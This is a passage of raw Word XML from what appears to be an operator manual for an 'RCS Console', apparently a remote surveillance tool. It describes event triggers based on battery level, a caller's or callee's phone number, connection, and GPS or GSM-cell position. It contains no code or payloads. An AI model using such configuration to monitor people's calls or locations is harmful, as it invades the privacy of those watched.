                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>8.6</w:t>
            </w:r>
            <w:r w:rsidR="00E64C3B">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00E64C3B" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00E64C3B">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="00E64C3B" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="00E64C3B">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="00E64C3B" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="00E64C3B">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="00E64C3B" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000450A6" w:rsidRPr="00A52C9B" w:rsidRDefault="00E64C3B" w:rsidP="00E64C3B">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(Battery)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="289" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000450A6" w:rsidRDefault="000450A6" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000450A6" w:rsidRPr="00E64C3B" w:rsidRDefault="000450A6" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="000450A6" w:rsidRPr="00E64C3B" w:rsidRDefault="000450A6" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="000450A6" w:rsidRPr="00E64C3B" w:rsidRDefault="000450A6" w:rsidP="00424FFC">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0450A6" w:rsidRPr="00E64C3B" w:rsidRDefault="000450A6"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0450A6" w:rsidRPr="00E64C3B" w:rsidRDefault="000450A6"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allows you to specify which type of Event you’re about to create.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00247880" w:rsidRPr="0029750F" w:rsidRDefault="00247880" w:rsidP="00247880">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="000450A6" w:rsidRPr="0029138B" w:rsidRDefault="000450A6" w:rsidP="00247880">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:highlight w:val="red"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidR="00E64C3B" w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Min</w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="007E4008">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>is the minimum battery percentage to trigger the Event.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00247880" w:rsidRPr="0029750F" w:rsidRDefault="00247880" w:rsidP="00247880">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="000450A6" w:rsidRPr="00E64C3B" w:rsidRDefault="00E64C3B" w:rsidP="007E4008">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidR="007E4008">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Max</w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="007E4008">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>is the maximum battery percentage to trigger the Event.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BE54A7" w:rsidRDefault="00BE54A7" w:rsidP="0029138B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0029138B" w:rsidRDefault="0029138B">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29138B" w:rsidTr="0029138B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0029138B" w:rsidRDefault="003A4380" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1238" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:187.5pt;height:193.5pt;z-index:251833344;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId257" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1238" DrawAspect="Content" ObjectID="_1446455378" r:id="rId258"/>
              </w:object>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029138B" w:rsidRDefault="00E17308" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>8.7</w:t>
            </w:r>
            <w:r w:rsidR="0029138B">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="0029138B" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="0029138B">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="0029138B" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="0029138B">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="0029138B" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="0029138B">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="0029138B" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029138B" w:rsidRPr="00A52C9B" w:rsidRDefault="0029138B" w:rsidP="0029138B">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(Call)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="289" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0029138B" w:rsidRDefault="0029138B" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0029138B" w:rsidRPr="00E64C3B" w:rsidRDefault="0029138B" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="0029138B" w:rsidRPr="00E64C3B" w:rsidRDefault="0029138B" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="0029138B" w:rsidRPr="00E64C3B" w:rsidRDefault="0029138B" w:rsidP="00332A8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allows you to specify which type of Event you’re about to create.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00247880" w:rsidRPr="0029750F" w:rsidRDefault="00247880" w:rsidP="00247880">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="0029138B" w:rsidRPr="0029138B" w:rsidRDefault="0029138B" w:rsidP="00811743">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:highlight w:val="red"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Number</w:t>
            </w:r>
            <w:r w:rsidR="00811743">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the </w:t>
            </w:r>
            <w:r w:rsidR="00D63D31">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>callee’s or caller’s telephone number.</w:t>
            </w:r>
            <w:r w:rsidR="00811743">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:highlight w:val="red"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BE54A7" w:rsidRDefault="00BE54A7" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BE54A7" w:rsidRDefault="00BE54A7">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>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29138B" w:rsidTr="0029138B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0029138B" w:rsidRDefault="003A4380" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1237" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:187.5pt;height:160.5pt;z-index:251831296;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId259" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1237" DrawAspect="Content" ObjectID="_1446455379" r:id="rId260"/>
              </w:object>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029138B" w:rsidRDefault="00E17308" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>8.8</w:t>
            </w:r>
            <w:r w:rsidR="0029138B">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="0029138B" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="0029138B">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="0029138B" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="0029138B">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="0029138B" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="0029138B">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="0029138B" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029138B" w:rsidRPr="00A52C9B" w:rsidRDefault="0029138B" w:rsidP="0029138B">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(Connection)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="289" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0029138B" w:rsidRDefault="0029138B" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0029138B" w:rsidRPr="00E64C3B" w:rsidRDefault="0029138B" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="0029138B" w:rsidRPr="00E64C3B" w:rsidRDefault="0029138B" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="0029138B" w:rsidRPr="00E64C3B" w:rsidRDefault="0029138B" w:rsidP="00332A8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allows you to specify which type of Event you’re about to create.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029138B" w:rsidRPr="00E64C3B" w:rsidRDefault="0029138B" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BE54A7" w:rsidRDefault="00BE54A7" w:rsidP="0029138B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0029138B" w:rsidRDefault="0029138B">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29138B" w:rsidTr="0029138B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0029138B" w:rsidRDefault="003A4380" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1239" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:187.5pt;height:248.25pt;z-index:251835392;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId261" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1239" DrawAspect="Content" ObjectID="_1446455380" r:id="rId262"/>
              </w:object>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029138B" w:rsidRDefault="00732ABF" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>8.9</w:t>
            </w:r>
            <w:r w:rsidR="0029138B">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="0029138B" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="0029138B">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="0029138B" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="0029138B">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="0029138B" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="0029138B">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="0029138B" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029138B" w:rsidRPr="00A52C9B" w:rsidRDefault="0029138B" w:rsidP="00332A8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(Battery)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="289" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0029138B" w:rsidRDefault="0029138B" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0029138B" w:rsidRPr="00E64C3B" w:rsidRDefault="0029138B" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="0029138B" w:rsidRPr="00E64C3B" w:rsidRDefault="0029138B" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="0029138B" w:rsidRPr="00E64C3B" w:rsidRDefault="0029138B" w:rsidP="00332A8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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">(1) </w:t>
            </w:r>
            <w:r w:rsidRPr="00E64C3B">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>allows you to specify which type of Event you’re about to create.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00247880" w:rsidRPr="0029750F" w:rsidRDefault="00247880" w:rsidP="00247880">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="0029138B" w:rsidRPr="0029138B" w:rsidRDefault="0029138B" w:rsidP="00247880">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:highlight w:val="red"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] (2</w:t>
            </w:r>
            <w:r w:rsidR="00BF3BB3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>) is the type of position to be used (GPS or GSM Cell).</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00247880" w:rsidRPr="0029750F" w:rsidRDefault="00247880" w:rsidP="00247880">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
